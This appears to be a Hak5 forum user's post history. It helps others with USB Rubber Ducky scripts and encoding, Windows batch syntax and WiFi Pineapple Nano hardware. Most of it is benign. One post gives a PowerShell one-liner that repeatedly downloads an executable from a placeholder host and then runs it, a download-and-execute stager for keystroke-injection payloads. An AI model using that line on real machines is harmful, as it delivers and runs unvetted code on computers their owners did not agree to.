White Light
-
Posts
67 -
Joined
-
Last visited
-
Days Won
2
Posts posted by White Light
-
-
Is it not
CTRL SHIFT ENTER
Pre-edit:
Weird, you're right. The wiki does say CTRL-SHIFT, but I've never done it that way.
-
Duckencoder is made in java. You just download it, install JRE (or was it JDK...I never remember). To run the encoder, simply run this:
java -jar encoder.jar -i "duckyscriptfile.txt" -o inject.bin
As for the scripts themselves, you basically just type whatever you want the ducky to type later, like this:
DELAY 2000 GUI r DELAY 100 STRING notepad ENTER DELAY 1000 STRING Hello Hammerhead ENTER STRING Just imagine all the things you can do with a keyboard ENTER STRING The ducky can do that too!
I haven't seen any fully comprehensive guides for keyboard shortcuts, but probably the most important one is WIN+R (GUI r on the ducky). There's a lot of information available on the ducky wiki too.
-
Can't you replace the use of the _LenLoop label and associated GOTO with a nice FOR loop?
You can easily do that if you know the reasonable maximum for the length of string (like 512).
@echo off setlocal enabledelayedexpansion set /p "in=Input: " set len=1 set #=%in% for %%a in (256 128 64 32 16 8 4 2 1) do if not "!#:~%%a!"=="" set /a len+=%%a&set #=!#:~%%a! echo %in% is %len% chars long. pause
Though the original length script will take n/9 iterations to get the length, this would always take 9 loops for up to 512 characters.
-
Gosub is not a command. It's
call
There is also no "return", though the closest is
goto :eof
Your code would be as follows:
@echo off echo Calling a subroutine. call :subr1 rem The : is required when calling a subroutine. echo Returned from the subroutine. pause :subr1 echo In the subroutine. goto :eof rem goto :eof is not needed here as it would already be at the end of the file. Subroutines will run the code all the way to the end of the file, so this just jumps to the end.
-
Actually I'm fairly certain the green you are seeing is the green from the newly discovered LED, leaking into the plastic lens.
The blue LED is a single color -- blue.
Yeah, that's what I said. The green LED lit up if you had an external adapter plugged in before boot, instead of the solid blue.
-
Back on 1.0.1, if you had an external wifi adapter plugged in before it boots, it would light up the green LED instead of solid blue. Not really sure why that happens, but it was pretty neat.
- 1
-
I've noticed it on 0.2 as well. In addition, you can't add the deleted SSIDs back until you remove them first...which is weird.
-
Is it getting hotter than 110 C / 230 F? If so -- that's a problem. Otherwise, not so much.
Under normal circumstances indoors it's very unlikely that it would require active cooling. The thermal ratings on these chips are pretty high and the passive cooling of the NANO is designed within the chip tolerances.
I'll have to look at the exact temps when it's particularly hot, but leaving it running against the battery (or any flat surface, for that matter) seems to make things quite hot. Pressed against the battery, inside the tactical pouch, for hours at a time seems to exacerbate things.
-
Gonna have to update the pineapple logo to fit better, but looking good so far...
-
I hope not, but who knows, sometimes one just wants to have options ;)
here a first sketch with active cooling using a 15mm 5V micro fan:
I've been noticing that my nano is running awfully hot lately. Has any progress been made on this? Having some kind of active cooling solution would be helpful.
-
I'd prefer it to be a bit more subtle, along the lines of "Router Login Page" or something similar. I'll let you know if I find the location of that field if you're interested in changing it yourself.
Now that is a good idea.
-
Doesn't the twin duck firmware allow the duck to act as a mass storage device then you have to click to activate the keyboard emulator? What I was meaning is keeping the injections automatic while having an on board SD for storage. The SD card typically isn't considered a mass storage device so group policies tend to ignore them.
Nope, runs just fine. Acts as both keyboard and mass storage simultaneously. You can run stuff off the SD card as well as copy stuff to the SD card, all automatically.
-
Just one thing I noticed while trying to reproduce your issue (and the desired results): The autossh file is in /etc/config not /etc/conf
-
Is it typing anything and just failing GUI r or is it everything? Try opening a notepad window to see what is actually being typed.
-
What are the exact scripts you're trying to run? Keep in mind, the OS takes a bit of time before it'll accept key input when you first plug it in, so it's good to add a 2-4s delay at the top.
-
Please elaborate on what it is doing if it's not doing what you want. Both scripts are known to work using TwinDuck.
-
I would sincerely hope that apps like Facebook and Twitter implement SSL pinning to protect against somehting like this.
-
Both the Rubber Ducky and the Wifi Pineapple (new Nano version) are available in the hakshop, and shipping isn't too awful at $37 USD for the cheapest rate through USPS. I just checked some random address in Auckland to get an estimate, might (but unlikely) be different for your exact location. Mark V's aren't too commonly sold by third parties, and when they are they're generally for a premium (especially since they've been out of stock for quite some time now).I found one in an eBay auction that just started, with a buy-it-now of $325 plus over $100 USD (!) for shipping (to my own country, yours would be much higher).
-
You'll need Twin Duck for that.
-
Spent about 5 minutes using Safari for iOS trying to reproduce the problem, with no luck. Latest version of iOS Chrome.
-
One thing I noticed from time to time is the back button (upper left corner) occasionally goes to https://forums.hak5.org/undefined while browsing in Chrome for iOS. This doesn't happen every time, and for some reason it will work fine every time if I open the link in a new tab.
-
I'd suggest an initial delay of at least 2 seconds, and (at least while testing) increase your delay between ALL actions you run. 100ms may not be enough for the start menu to open up and permit entry.
Mr-Protocol brings up a good point too: using the run box is likely better than the start menu, as you don't have to deal with unreliable GUIs. You can start CMD as an administrator automatically through the run box by using powershell.
-
Why not try using a program that you already know can work on all the systems you're testing on?
-
I see a bunch of suggestions that are "easier", but why not just continuously retry the download using just powershell? That way you don't need to worry about walking away.
do{sleep 5;(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe')}while(!$?);&'C:\helper.exe'
Should work just fine. It'll loop forever until the file is downloaded (or until the process is closed), then it runs it.
Encoders, startup guides, resources for beginners.
in Classic USB Rubber Ducky
Posted
Oh yeah. Just about everything you can do with a mouse can be done using just a keyboard, and being able to automate it makes it even easier to reproduce. I learned this as a kid, when my crappy bluetooth mouse's batteries would die or it would (frequently) disconnect.